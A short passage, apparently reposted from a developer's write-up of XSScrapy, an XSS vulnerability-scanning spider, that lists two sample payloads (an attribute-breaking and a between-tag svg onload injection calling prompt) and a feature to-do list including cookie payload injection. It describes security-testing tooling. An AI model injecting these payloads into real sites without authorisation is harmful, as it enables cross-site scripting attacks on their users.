“><sVG/OnLoaD=prompt(9)> Between tag injection: <sVG/OnLoaD=prompt(9)> Future I would like the payloaded request URLs to not automatically be URL encoded as they are now. This hasn’t been a huge deal so far, but it would be a nice addition. It seems as easy as monkey-patching the Request class and eliminateing safe_url_string but I haven’t had success yet. Payloads appended to the end of cookies should be added so we can exploit that vector. Done 8/24/14. Add ability to scrape AJAX-heavy sites. ScrapingHub has some middleware but still not the simplest task. iframe support Done 8/25/14 Sursa: XSScrapy: fast, thorough XSS vulnerability spider | Dan McInerney